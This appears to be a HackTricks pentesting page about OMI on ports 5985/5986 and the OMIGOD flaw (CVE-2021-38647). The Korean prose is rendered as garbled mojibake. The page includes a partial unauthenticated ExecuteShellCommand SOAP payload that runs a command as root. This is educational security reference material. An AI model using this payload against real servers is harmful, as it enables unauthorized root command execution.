5985,5986 - Pentesting OMI
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ธฐ๋ณธ ์ ๋ณด
OMI๋ Microsoft์์ ์๊ฒฉ ๊ตฌ์ฑ ๊ด๋ฆฌ๋ฅผ ์ํด ์ค๊ณ๋ ์คํ ์์ค ๋๊ตฌ๋ก ์ ๊ณต๋ฉ๋๋ค. ์ด๋ Azure์์ ๋ค์๊ณผ ๊ฐ์ ์๋น์ค๋ฅผ ์ฌ์ฉํ๋ Linux ์๋ฒ์ ํนํ ๊ด๋ จ์ด ์์ต๋๋ค:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
์ด ์๋น์ค๊ฐ ํ์ฑํ๋๋ฉด omiengine ํ๋ก์ธ์ค๊ฐ ์์๋์ด ๋ชจ๋ ์ธํฐํ์ด์ค์์ ๋ฃจํธ๋ก ์์ ๋๊ธฐํฉ๋๋ค.
๊ธฐ๋ณธ ํฌํธ๋ก ์ฌ์ฉ๋๋ ๊ฒ์ 5985 (http) ๋ฐ 5986 (https)์ ๋๋ค.
CVE-2021-38647 ์ทจ์ฝ์
9์ 16์ผ์ ๊ด์ฐฐ๋ ๋ฐ์ ๊ฐ์ด, ์ธ๊ธ๋ ์๋น์ค๊ฐ ๋ฐฐํฌ๋ Azure์ Linux ์๋ฒ๋ OMI์ ์ทจ์ฝํ ๋ฒ์ ์ผ๋ก ์ธํด ์ทจ์ฝํฉ๋๋ค. ์ด ์ทจ์ฝ์ ์ OMI ์๋ฒ๊ฐ /wsman ์๋ํฌ์ธํธ๋ฅผ ํตํด ๋ฉ์์ง๋ฅผ ์ฒ๋ฆฌํ ๋ ์ธ์ฆ ํค๋๋ฅผ ์๊ตฌํ์ง ์์ ํด๋ผ์ด์ธํธ๋ฅผ ์๋ชป ์ธ์ฆํ๋ ๋ฐ ์์ต๋๋ค.
๊ณต๊ฒฉ์๋ ์ธ์ฆ ํค๋ ์์ด โExecuteShellCommandโ SOAP ํ์ด๋ก๋๋ฅผ ์ ์กํ์ฌ ์๋ฒ๊ฐ ๋ฃจํธ ๊ถํ์ผ๋ก ๋ช ๋ น์ ์คํํ๋๋ก ๊ฐ์ ํ ์ ์์ต๋๋ค.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
์ด CVE์ ๋ํ ์์ธํ ์ ๋ณด๋ ์ฌ๊ธฐ ํ์ธํ์ธ์.
์ฐธ์กฐ
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


